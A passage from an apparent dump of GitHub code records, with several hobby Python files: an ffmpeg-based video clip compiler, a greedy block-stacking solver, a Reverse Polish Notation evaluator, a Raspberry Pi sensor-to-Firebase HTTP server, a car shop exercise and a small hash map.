cv2.VideoCapture(vid_file_path)\n# return vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n# def get_vid_dims(vid_file_path):\n# vid = cv2.VideoCapture(vid_file_path)\n# return (vid.get(cv2.CAP_PROP_FRAME_WIDTH), vid.get(cv2.CAP_PROP_FRAME_HEIGHT))\n \n \ndef get_height_of_tallest_vid_in_dir(dir_path):\n vid_file_paths = file_system_utils.get_relative_path_of_files_in_dir(dir_path, '.mp4')\n \n max_height = 0\n for vid_file_path in vid_file_paths:\n height = vid_edit_utils.get_vid_dims(vid_file_path)[1]\n if height > max_height:\n max_height = height\n return max_height\n\n# dont delete until you have done a LOT of testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n# def shortest_working_height(tallest_vid_height):\n# h = OUTPUT_VID_HEIGHTS[0]\n# for height in OUTPUT_VID_HEIGHTS[1:]:\n# if tallest_vid_height < height:\n# h = height\n# else:\n# break\n# return h\n\ndef smallest_working_dims(tallest_vid_height):\n dims = (0,0)\n \n if tallest_vid_height > OUTPUT_VID_DIMS_L[0][1]:\n raise Exception('ERROR: Clip height > tallest height in OUTPUT_VID_DIMS_L: %s > %s' %(tallest_vid_height, OUTPUT_VID_DIMS_L[0][1]))\n \n for valid_dims in OUTPUT_VID_DIMS_L:\n if tallest_vid_height <= valid_dims[1]:\n dims = valid_dims\n else:\n return dims\n# return dims\n\n\n# dont delete until you have done a LOT of testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# def resize_all_vids_in_dir(new_height, dir_path):\n# from moviepy.editor import VideoFileClip # this here so annoying msg / load doesnt happen every gui start\n# \n# vid_file_paths = file_system_utils.get_relative_path_of_files_in_dir(dir_path, '.mp4')\n# \n# for vid_file_path in vid_file_paths:\n# if new_height != get_height_of_vid(vid_file_path):\n# clip = VideoFileClip(vid_file_path)\n# # clip_resized = clip.resize(height=new_height) # make the height 360px ( According to moviePy documenation The width is then computed so that the width/height ratio is conserved.)\n# clip_resized = clip.resize(height=1080, width=1920) # make the height 360px ( According to moviePy documenation The width is then computed so that the width/height ratio is conserved.)\n# \n# clip_resized.write_videofile('temp.mp4')\n# \n# clip.reader.close()\n# clip.audio.reader.close_proc()\n# \n# os.remove(vid_file_path)\n# os.rename('temp.mp4', vid_file_path)\n \n \ndef get_scaled_width(dims, new_h):\n og_ratio = dims[0] / dims[1]\n return og_ratio * new_h\n \n \n \ndef resize_all_vids_in_dir(dims, dir_path):\n vid_file_paths = file_system_utils.get_relative_path_of_files_in_dir(dir_path, '.mp4')\n \n o_w = str(dims[0])\n o_h = str(dims[1])\n \n for vid_file_path in vid_file_paths:\n temp_file_path = 'temp_' + vid_file_path.split('\\\\')[-1] \n \n \n vid_dims = vid_edit_utils.get_vid_dims(vid_file_path)\n scaled_w = get_scaled_width(vid_dims, dims[0]) # put back in after test !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n if dims != vid_dims: \n w_pad = str( int((dims[0] - scaled_w / 4 ) ))\n h_pad = str( int((dims[1] - vid_dims[1]) / 2 ))\n cmd = 'ffmpeg -i ' + vid_file_path + ' -vf scale=' + o_w + ':' + o_h + ':force_original_aspect_ratio=decrease,pad=' + o_w + ':' + o_h + ':' + w_pad + ':' + h_pad + ',setsar=1 ' + temp_file_path + ' -y'\n print('cmd: ', cmd) #``````````````````````````````````````````````````````````````````````````````````````````````````````````````````` \n# cmd = 'ffmpeg -i ' + vid_file_path + ' -vf scale=' + str(dims[0]) + ':' + str(dims[1]) + ' temp.mp4'\n subprocess.call(cmd, shell=True)\n \n \n \n \n while(True):\n try: \n os.remove(vid_file_path)\n break\n except PermissionError as e:\n print('got permission error when deleting file, sleeping then trying again...')\n time.sleep(1)\n \n \n while(True):\n try: \n os.rename(temp_file_path, vid_file_path)\n break\n except PermissionError as e:\n print('got permission error when re-sizing, sleeping then trying again...')\n time.sleep(1)\n\n\n \ndef compile_all_clips_in_dir(clips_dir_path, output_vid_path):\n# from moviepy.editor import VideoFileClip, concatenate_videoclips # this here so annoying msg / load doesnt happen every gui start\n\n # build concat txt file\n# line_list = []\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# \n# for vid_filename in vid_filenames_to_compile:\n# vid_file_path = CLIPS_TO_COMPILE_DIR_PATH + '/' + vid_filename \n# line_list.append('file ' + vid_file_path)\n# # print(line_list)#``````````````````````````````````````````````````````````````````````````````````````````````````````````````\n# write_text_file(VID_CONCAT_FILE_PATH, line_list)\n# \n# \n# # concat the files in the txt file\n# cmd = 'ffmpeg -f concat -i ' + VID_CONCAT_FILE_PATH + ' -c copy ' + output_vid_path + ' -y'\n# print('cmd: ', cmd)#`````````````````````````````````````````````````````````````````````````````````````````````````\n# subprocess.call(cmd, shell=True)\n\n\n# def _make_input_files_str(vid_filenames_to_compile):\n# input_files_str = ''\n# for vid_filename in vid_filenames_to_compile:\n# vid_file_path = clips_dir_path + '/' + vid_filename \n# input_files_str += ' -i ' + vid_file_path\n# return input_files_str\n \n def _try_to_rename_until_sucsessful_if_exists(src_path, dest_path):\n if os.path.exists(src_path):\n if os.path.exists(dest_path):\n os.remove(dest_path)\n while(True):\n try:\n os.rename(src_path, dest_path)\n break\n except PermissionError:\n print('got PermissionError while trying to rename %s --> %s, sleeping then trying again...' %(src_path, dest_path))\n time.sleep(0.5)\n \n \n # put this back in below func !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n def _make_input_files_str(vid_path_l):\n input_files_str = ''\n for vid_path in vid_path_l:\n input_files_str += ' -i ' + vid_path\n return input_files_str\n \n \n def _make_thread_cmd_str_l(vid_paths_to_compile, save_file_name = None):\n\n def __make_cmd_str(vid_paths_to_compile, output_file_path):\n input_files_str = _make_input_files_str(vid_paths_to_compile)\n num_clips_str = str( len(vid_paths_to_compile) )\n cmd = 'ffmpeg' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=' + num_clips_str + ':v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + output_file_path + ' -y'\n return cmd\n \n def __all_cmd_str_fit(cmd_str_l):\n for cmd_str in cmd_str_l:\n if len(cmd_str) > MAX_CMD_CHARS:\n return False\n return True\n \n def __split_list(alist, wanted_parts=1):\n length = len(alist)\n return [ alist[i*length // wanted_parts: (i+1)*length // wanted_parts] \n for i in range(wanted_parts) ]\n \n if save_file_name == None:\n thread_output_file_path_list = ['thread_temp_1.mp4']\n else: \n thread_output_file_path_list = [save_file_name]\n\n cmd_str_l = [__make_cmd_str(vid_paths_to_compile, thread_output_file_path_list[0])]\n num_threads = 1\n \n while(not __all_cmd_str_fit(cmd_str_l)):\n cmd_str_l = []\n num_threads += 1\n thread_output_file_path_list.append('thread_temp_' + str(num_threads) + '.mp4')\n\n vid_path_ll = __split_list(vid_paths_to_compile, num_threads)\n for vid_path_l_num, vid_path_l in enumerate(vid_path_ll):\n cmd_str_l.append(__make_cmd_str(vid_path_l, thread_output_file_path_list[vid_path_l_num]))\n \n \n return cmd_str_l, thread_output_file_path_list\n \n \n# # this one works but cmd line str can be too long !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n vid_paths_to_compile = []\n for vid_filename in vid_filenames_to_compile:\n vid_paths_to_compile.append(clips_dir_path + '/' + vid_filename)\n \n# print('vid_paths_to_compile: ', vid_paths_to_compile)#```````````````````````````````````````````````````````````\n \n thread_cmd_str_l, thread_output_file_path_list = _make_thread_cmd_str_l(vid_paths_to_compile)\n\n if len(thread_cmd_str_l) == 1:\n# print('cmd: ', thread_cmd_str_l[0])#````````````````````````````````````````````````````````````````````````````\n subprocess.call(thread_cmd_str_l[0],shell=True) \n \n# print('about to rename')#```````````````````````````````````````````````````````````````````````````````````````````\n _try_to_rename_until_sucsessful_if_exists(thread_output_file_path_list[0], output_vid_path)\n# print('just renamed')#```````````````````````````````````````````````````````````````````````````````````````````\n\n \n else:\n def run_subprocess(thread_cmd_str):\n subprocess.call(thread_cmd_str, shell=True)\n thread_l = []\n for thread_cmd_str in thread_cmd_str_l:\n print(thread_cmd_str)#`````````````````````````````````````````````````````````````````````````````````````\n th = Thread(target=run_subprocess, args=(thread_cmd_str,) ) \n thread_l.append(th)\n \n for thread in thread_l:\n thread.start()\n \n for thread in thread_l:\n thread.join()\n \n \n final_output_temp_vid_path = 'final_temp.mp4' # probably dont need to use this, error was unrelated, but im lazy\n thread_cmd_str_l_2, thread_output_file_path_list_2 = _make_thread_cmd_str_l(thread_output_file_path_list, final_output_temp_vid_path)\n# print(thread_cmd_str_l_2)#```````````````````````````````````````````````````````````````````````````\n\n subprocess.call(thread_cmd_str_l_2[0], shell=True)\n \n file_system_utils.delete_if_exists(output_vid_path)\n _try_to_rename_until_sucsessful_if_exists(thread_output_file_path_list_2[0], output_vid_path)\n\n \n # delete temp thread vids\n for thread_output_file_path in thread_output_file_path_list:\n os.remove(thread_output_file_path)\n \n print('done with compile, num threads: ', len(thread_cmd_str_l))#``````````````````````````````````````````````````````\n \n# input_files_str = _make_input_files_str(vid_filenames_to_compile)\n# for vid_filename in vid_filenames_to_compile:\n# vid_file_path = clips_dir_path + '/' + vid_filename \n# input_files_str += ' -i ' + vid_file_path\n \n# num_clips = str(len(vid_filenames_to_compile))\n# \n# cmd = 'ffmpeg ' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=' + num_clips + ':v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + output_vid_path + ' -y'\n# print('cmd: ', cmd)#`````````````````````````````````````````````````````````````````````````````````````````````````\n# \n# subprocess.call(cmd,shell=True) \n\n\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# clip_list = []\n# for vid_filename in vid_filenames_to_compile:\n# clip = VideoFileClip(clips_dir_path + '/' + vid_filename)\n# clip_list.append(clip)\n# # clip.reader.close()\n# # clip.audio.reader.close_proc()\n# \n# final_clip = concatenate_videoclips(clip_list, method='compose')\n# final_clip.write_videofile(output_vid_path) \n\n\n\n# compile_progress_clip_path = clips_dir_path + '/prog/' + 'A.mp4'\n# temp_compile_progress_clip_path = clips_dir_path + '/' + 'temp_prog.mp4'\n# compile_progress_clip_backup_path = clips_dir_path + '/temp_prog'# + 'A_backup.mp4'\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# cnt = 0# just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# \n# while(len(vid_filenames_to_compile) > 1):\n# cnt += 1 # just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# \n# \n# \n# \n# if os.path.isfile(compile_progress_clip_path):\n# clip_1_path = compile_progress_clip_path\n# else:\n# clip_1_path = clips_dir_path + '/' + vid_filenames_to_compile[0]\n# clip_2_path = clips_dir_path + '/' + vid_filenames_to_compile[1]\n# input_files_str = ' -i ' + clip_1_path + ' -i ' + clip_2_path\n# \n# \n# # input_files_str = ''\n# # for vid_filename in vid_filenames_to_compile[0:2]:\n# # vid_file_path = clips_dir_path + '/' + vid_filename \n# # input_files_str += ' -i ' + vid_file_path\n# \n# print('input_files_str: ', input_files_str)\n# \n# # cmd = 'ffmpeg ' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=2:v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + output_vid_path + ' -y'\n# cmd = 'ffmpeg ' + input_files_str + ' -filter_complex \"[0:v:0] [0:a:0] [1:v:0] [1:a:0] concat=n=2:v=1:a=1 [v] [a]\" -map \"[v]\" -map \"[a]\" ' + 'temp.mp4' + ' -y'\n# \n# # print('sleeping...')\n# # time.sleep(5)\n# print('cmd: ', cmd)#````````````````````````````````````````````````````````````````````````````````````````````````````````````````\n# subprocess.call(cmd,shell=True) \n# \n# file_system_utils.delete_if_exists(compile_progress_clip_path)\n# os.rename('temp.mp4', compile_progress_clip_path)\n# \n# \n# # for vid_filename in vid_filenames_to_compile[0:2]:\n# # vid_path = clips_dir_path + '/' + vid_filename\n# # if vid_path != compile_progress_clip_path: \n# # os.remove(vid_path)\n# \n# if clip_1_path != compile_progress_clip_path:\n# os.remove(clip_1_path)\n# os.remove(clip_2_path)\n# \n# \n# \n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# \n# #copy the currently working vid so far just in case something goes wrong\n# # file_system_utils.copy_files_to_dest([compile_progress_clip_path], compile_progress_clip_backup_path + str(cnt))\n# \n# os.rename(compile_progress_clip_path, output_vid_path)\n\n\n\n\n\n\n\n\n \n# compile_progress_clip_path = clips_dir_path + '/' + 'A.mp4'\n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# cnt = 0# just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# while(len(vid_filenames_to_compile) > 1):\n# cnt += 1 # just for testing !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n# clip_0 = VideoFileClip(clips_dir_path + '/' + vid_filenames_to_compile[0])\n# clip_1 = VideoFileClip(clips_dir_path + '/' + vid_filenames_to_compile[1])\n# \n# final_clip = concatenate_videoclips([clip_0, clip_1], method='compose')\n# final_clip.write_videofile(compile_progress_clip_path) \n# \n# clip_0.reader.close()\n# clip_0.audio.reader.close_proc()\n# clip_1.reader.close()\n# clip_1.audio.reader.close_proc()\n# \n# for vid_filename in vid_filenames_to_compile[0:2]:\n# vid_path = clips_dir_path + '/' + vid_filename\n# if vid_path != compile_progress_clip_path: \n# os.remove(vid_path)\n# \n# vid_filenames_to_compile = [f for f in listdir(clips_dir_path) if isfile(join(clips_dir_path, f))]\n# \n# os.rename(compile_progress_clip_path, output_vid_path)\n \n# compile_progress_vid_file_path = 'compile_progress.mp4'\n\n print('done with compile')\n \n \n\n \n \ndef compile_clips(clip_path_list, output_file_path, prog_widget_d = None):\n c_start = time.time()\n \n# if prog_widget_d != None:\n# prog_widget_d['lbl_frm'].grid(column=1, row=40)\n \n# print('in compile, about to comile these clips: ', clip_path_list)\n print('deleting all files in dir: ' + CLIPS_TO_COMPILE_DIR_PATH + ' if it exists...')\n if os.path.exists(CLIPS_TO_COMPILE_DIR_PATH):\n file_system_utils.delete_all_files_in_dir(CLIPS_TO_COMPILE_DIR_PATH)\n \n print('copying accepted clips to new dir: ' + CLIPS_TO_COMPILE_DIR_PATH + ' ...')\n file_system_utils.copy_files_to_dest(clip_path_list, CLIPS_TO_COMPILE_DIR_PATH)\n \n# print('resizing clips in dir...')\n# if prog_widget_d != None:\n# prog_widget_d['resize_pb'].start(10)\n \n tallest_vid_height = get_height_of_tallest_vid_in_dir(CLIPS_TO_COMPILE_DIR_PATH)\n output_vid_dims = smallest_working_dims(tallest_vid_height)\n resize_all_vids_in_dir(output_vid_dims, CLIPS_TO_COMPILE_DIR_PATH)\n \n print('resize complete, total time: ', time.time() - c_start)\n \n print('compiling all clips in: ', clip_path_list)\n compile_all_clips_in_dir(CLIPS_TO_COMPILE_DIR_PATH, output_file_path)\n \n print('compile complete, total time: ', time.time() - c_start)\n \n \n# resize_all_vids_in_dir(1080, VIDS_TO_COMPILE_FOLDER_PATH)\nif __name__ == '__main__':\n start_time = time.time()\n print('in compile main!!!!!!!!!!!!')\n# compile_all_clips_in_dir('C:/Users/Brandon/Documents/Personal_Projects/reddit_comp/old', 'tttest_output.mp4' ) # OUTPUT_VID_FILE_PATH\n file_path_l = ['C:/Users/Brandon/Documents/Personal_Projects/reddit_comp/current_data/downloaded_clips/post_0001.mp4',\n 'C:/Users/Brandon/Documents/Personal_Projects/reddit_comp/current_data/downloaded_clips/post_0007.mp4']\n# compile_clips(file_path_l, 'test_output.mp4')\n# file_system_utils.copy_files_to_dest(file_path_l, 'current_data/test_copy')\n# resize_vid(file_path_l[1], 640)\n# resize_all_vids_in_dir(720, CLIPS_TO_COMPILE_DIR_PATH)\n\n clips_dir_path = 'C:/Users/Brandon/Documents/Personal_Projects/vid_m_comp_big_data/vids'\n# tallest_vid_height = get_height_of_tallest_vid_in_dir(clips_dir_path)\n# print('tallest_vid_height: ', tallest_vid_height)\n# output_vid_dims = smallest_working_dims(tallest_vid_height)\n# print('in comile main test, about to resize all vids in dir to dims: ', output_vid_dims)\n# resize_all_vids_in_dir(output_vid_dims, clips_dir_path)\n\n\n compile_all_clips_in_dir(clips_dir_path, clips_dir_path + '/big_vid.mp4')\n print('Test Compile Time: ', time.time() - start_time)\n\n\n print('done')\n\n\n\n","repo_name":"Brandon-Valley/vid_m_comp","sub_path":"compile_clips.py","file_name":"compile_clips.py","file_ext":"py","file_size_in_byte":22190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41838095240","text":"import sys\nimport os\nimport time\nfrom operator import attrgetter\n\n\npath = sys.argv[1]\nblocAffiche = sys.argv[2]\ntimer = sys.argv[3]\nstart = 0\nstop = 0\n\n\nclass bloc:\n _longeur = 0\n _profondeur = 0\n _hauteur = 0\n _aire = 0\n\n def __init__(self, longeur, profondeur, hauteur,aire):\n self._longeur = longeur\n self._profondeur = profondeur\n self._hauteur = hauteur\n self._aire = aire\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n \n blocs = []\n blocsTries = []\n blocSolutions = []\n currentLongeur = 0\n currentProfondeur = 0\n hauteurPile = 0\n\n #Convertir chaque ligne du fichier texte en objet bloc\n with open(path, \"r\") as file:\n for line in file:\n currentLine = line.split()\n\n # conversion en objet\n currentBloc = bloc(int(currentLine[0]),int(currentLine[1]), int(currentLine[2]), int(currentLine[0]) * int(currentLine[1]))\n\n blocs.append(currentBloc)\n\n\n if(timer == \"true\"):\n start = time.perf_counter()\n ################################################################################\n\n #On trie les blocs selon l'aire\n blocsTries = sorted(blocs, key=attrgetter('_aire'), reverse = True)\n\n # traitement du premier bloc\n blocSolutions.append(blocsTries[0])\n currentLongeur = blocSolutions[0]._longeur\n currentProfondeur= blocSolutions[0]._profondeur\n hauteurPile = blocSolutions[0]._hauteur\n\n #Etape 3: Ajout des blocs dans l'ensemble solution\n for bloc in blocsTries:\n #on ajoute les blocs strictement plus petit dans l'ensemble solution\n if((bloc._longeur < currentLongeur) and (bloc._profondeur < currentProfondeur)) :\n currentLongeur = bloc._longeur\n currentProfondeur = bloc._profondeur\n blocSolutions.append(bloc)\n hauteurPile += bloc._hauteur\n\n #arret du compteur\n stop = time.perf_counter()\n\n\n\n################################################################################\n\n #sortie de la solution\n\n index=0\n\n myRange = (range(0, len(blocSolutions)))\n if (blocAffiche == \"true\"):\n for i in myRange :\n index = index+1\n print(blocSolutions[i]._hauteur, \" \", blocSolutions[i]._longeur, \" \", blocSolutions[i]._profondeur)\n #print(hauteurPile)\nif(timer == \"true\"):\n print((stop - start)*1000)","repo_name":"thierlarouche/INF8775-TP2","sub_path":"src/glouton.py","file_name":"glouton.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35818819518","text":"\"\"\"\nEvaluate the value of an arithmetic expression in Reverse Polish Notation.\n\nValid operators are +, -, *, /. Each operand may be an integer or another expression.\n\nNote:\n\nDivision between two integers should truncate toward zero.\nThe given RPN expression is always valid. That means the expression would always evaluate to a result and there won't be any divide by zero operation.\nExample 1:\n\nInput: [\"2\", \"1\", \"+\", \"3\", \"*\"]\nOutput: 9\nExplanation: ((2 + 1) * 3) = 9\nExample 2:\n\nInput: [\"4\", \"13\", \"5\", \"/\", \"+\"]\nOutput: 6\nExplanation: (4 + (13 / 5)) = 6\nExample 3:\n\nInput: [\"10\", \"6\", \"9\", \"3\", \"+\", \"-11\", \"*\", \"/\", \"*\", \"17\", \"+\", \"5\", \"+\"]\nOutput: 22\nExplanation: \n ((10 * (6 / ((9 + 3) * -11))) + 17) + 5\n= ((10 * (6 / (12 * -11))) + 17) + 5\n= ((10 * (6 / -132)) + 17) + 5\n= ((10 * 0) + 17) + 5\n= (0 + 17) + 5\n= 17 + 5\n= 22\n\"\"\"\n\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n if not tokens or len(tokens) == 0:\n return 0\n\n stack = []\n for t in tokens:\n if t in ['+', '-', '*', '/']:\n num2 = stack.pop()\n num1 = stack.pop()\n stack.append(self.operate(num1, num2, t))\n else:\n stack.append(int(t))\n return stack.pop()\n\n def operate(self, num1, num2, operator):\n if operator == '+':\n return num1+num2\n if operator == '-':\n return num1-num2\n if operator == '*':\n return num1*num2\n if operator == '/':\n return int(num1/num2)\n","repo_name":"wenyaowu/leetcode-js","sub_path":"problems/evaluateReversePolishNotation.py","file_name":"evaluateReversePolishNotation.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31381815157","text":"#!/usr/bin/env python\n\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nimport RPi.GPIO as GPIO\nfrom firebase import firebase\nimport time\nimport os\nimport serial\nimport SocketServer\nimport json\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(37,GPIO.IN)\n\nfirebase = firebase.FirebaseApplication('https://chat-9910d.firebaseio.com/')\nReceive_serial = serial.Serial('/dev/ttyACM0', 9600)\n\nclass S(BaseHTTPRequestHandler):\n #def __init__(self, args):\n # pass\n \n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n self.wfile.write(\"Flavio Bergamini\")\n\n def do_HEAD(self):\n self._set_headers()\n\n def fire(self, data, send):\n if data == 1:\n firebase.delete('/tasks/umidadeM', None)\n send = firebase.post('/tasks/umidadeM', send)\n elif data == 2:\n firebase.delete('/tasks/acidezM', None)\n send = firebase.post('/tasks/acidezM', send)\n else:\n print(\"Sensor invalido\")\n \n def do_POST(self):\n global content_length\n global data\n content_length = int(self.headers['Content-Length']) # <--- Gets the size of data\n post_data = self.rfile.read(content_length) # <--- Gets the data itself\n \n print(type(post_data))\n print(post_data)\n if post_data == '1.00' or post_data == '2.00':\n post_data = float(post_data)\n post_data = int(post_data)\n print(type(post_data))\n print(post_data)\n data = post_data\n print(\"entrou\")\n else:\n try:\n self.fire(data, post_data)\n except:\n print(\"Mensagem invalida para ser enviada ao Firebase\")\n \n self._set_headers()\n self.wfile.write(\"

POST!

\")\n serialAT()\n \ndef serialAT():\n print('serial')\n Receive_serial.write('1')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/umidade', None)\n send = firebase.post('/tasks/umidade', send)\n \n data = Receive_serial.write('2')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/acidez', None)\n send = firebase.post('/tasks/acidez', send)\n\n Receive_serial.write('3')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/temp', None)\n send = firebase.post('/tasks/temp', send)\n \n data = Receive_serial.write('4')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/pluv', None)\n send = firebase.post('/tasks/pluv', send)\n\n if GPIO.RISING:\n firebase.delete('/tasks/bateria', None)\n send = firebase.post('/tasks/bateria', 'Bateia fraca')\n\n\ndef run(server_class=HTTPServer, handler_class=S, port=80):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print ('Starting httpd...')\n \n #receive = firebase.get('/tasks/Station', None)\n #receive = str(receive)\n #print(type(receive))\n #print(receive)\n #size = int(len(receive))\n #print(size)\n #receive_process = receive[(size-6):(size-3)]\n #print(receive_process)\n\n #receiveM = firebase.get('/tasks/Module', None)\n #receiveM = str(receiveM)\n #print(type(receiveM))\n #print(receiveM)\n #size = int(len(receiveM))\n #print(size)\n #receiveM_process = receiveM[(size-6):(size-3)]\n #print(receiveM_process)\n #--parce = json.loads(receive)\n #--print(parce[\"taskS\"])\n\n #Receive_serial.flushInput()\n #Receive_serial.flushOutput()\n \n #Receive_serial.write('t')\n #ser = Receive_serial.readline()\n #print('---------------------------')\n #print(ser)\n #size = int(len(ser))\n #ser = ser[0:(size-2)]\n #firebase.delete('/tasks/temp', None)\n #send = firebase.post('/tasks/temp', ser)\n #print('---------------------------')\n\n #Receive_serial.write('a')\n #ser = Receive_serial.readline()\n #print('---------------------------')\n #print(ser)\n #size = int(len(ser))\n #ser = ser[0:(size-2)]\n #firebase.delete('/tasks/acidez', None)\n #send = firebase.post('/tasks/acidez', ser)\n #print('---------------------------')\n\n #Receive_serial.write('u')\n #ser = Receive_serial.readline()\n #print('---------------------------')\n #print(ser)\n #size = int(len(ser))\n #ser = ser[0:(size-2)]\n #firebase.delete('/tasks/umidade', None)\n #send = firebase.post('/tasks/umidade', ser)\n #print('---------------------------')\n httpd.serve_forever()\n GPIO.add_event_detect(37, GPIO.RISING, callback=serialAT, bouncetime=50)\n \n \n\nif __name__ == \"__main__\":\n from sys import argv\n if len(argv) == 2:\n run(port=int(argv[1]))\n else:\n run()\n","repo_name":"flaviobergamini/Server_HTTP_Firebase_Station","sub_path":"HTTP.py","file_name":"HTTP.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21591578989","text":"class CarFactory:\n model = 'UAZ'\n common_price = 650000\n\n def build(self, count=1):\n cars = []\n\n for x in range(count):\n cars.append(\n Car(self.model, self.common_price)\n )\n\n return cars\n\n\nclass CarStock:\n max_count: int\n cars: list\n\n\n def __init__(self, count=0):\n self.max_count = count\n self.cars = []\n\n def store(self, cars: list):\n # проверять self.max_count (cars)\n if len(self.cars) >= self.max_count:\n raise CapacityExeption(len(self.cars), len(self.cars) + len(cars))\n elif len(cars) > (self.max_count - len(self.cars)):\n raise CapacityExeption(self.max_count, len(self.cars) + len(cars))\n\n self.cars.extend(cars)\n\nclass CapacityExeption(Exception):\n def __init__(self, current, needle):\n self.current = current\n self.needle = needle\n\n def __str__(self):\n return f\"Не достаточно места на складе. Фактически = {self.current}, необходимо = {self.needle}\"\n\n\n\n\nclass NotEnMoneyExeption(Exception):\n def __init__(self, current, needle):\n self.current = current\n self.needle = needle\n\n def __str__(self):\n return f\"Не достаточно денег. Наличных = {self.current}, необходимо = {self.needle}\"\n\n\nclass Car:\n medel: str\n price: int\n\n def __init__(self, medel, price):\n self.medel = medel\n self.price = price\n\n\nclass Custome:\n money: int\n\n def __init__(self, money):\n self.money = money\n\n def buy(self, car: Car):\n # проверять текущий баланс\n if car.price > self.money:\n raise NotEnMoneyExeption(self.money, car.price)\n self.money -= car.price\n\n#Создаем завод\nfactory = CarFactory()\n\ntry:\n #Создаем склад\n stock = CarStock(1)\nexcept CapacityExeption as exeptionStore:\n print(f\"\")\n#покупатель с деньгами\ndim = Custome(100000)\n\n#создаем определенное количество автомобилей на заводе\ncar_list = factory.build(4)\n#разместим машины в магазине\nstock.store(car_list)\n\ntry:\n #покопаем авто\n dim.buy(stock.cars[1])\nexcept NotEnMoneyExeption as exception:\n print(f\"для покупки вам не хватает - {exception.needle - exception.current} руб\")\n\nprint(dim.money)","repo_name":"Neodim5/GeekPython","sub_path":"lesson8/test/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69800260251","text":"class mapNode:\r\n def __init__(self, key, value):\r\n self.key = key\r\n self.value = value\r\n self.next = None\r\n\r\nclass map:\r\n def __init__(self):\r\n self.bucketSize = 20\r\n self.buckets = [None for i in range(self.bucketSize)]\r\n self.count = 0\r\n\r\n def getIndex(self, hashCode):\r\n return hashCode % 20\r\n\r\n def insert(self, key, value):\r\n hashCode = hash(key)\r\n index = self.getIndex(hashCode)\r\n head = self.buckets[index]\r\n while head is not None:\r\n if head.key == key:\r\n head.value = value\r\n return\r\n head = head.next\r\n head = self.buckets[index]\r\n newNode = mapNode(key, value)\r\n self.buckets[index] = newNode\r\n newNode.next = head\r\n self.count += 1","repo_name":"arnab0000/CodingNinjas-DS","sub_path":"1_numpy/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21512557363","text":"from utils.trusted_area_etl_plugin import *\nfrom utils.logger import config_log\n\nLOG = config_log()\n\ndef orders_dataset():\n '''\n This function will read order, status, restaurant and consumer dataframs from RAW area.\n This function will do transformations, and write the final result to Trusted area.\n '''\n 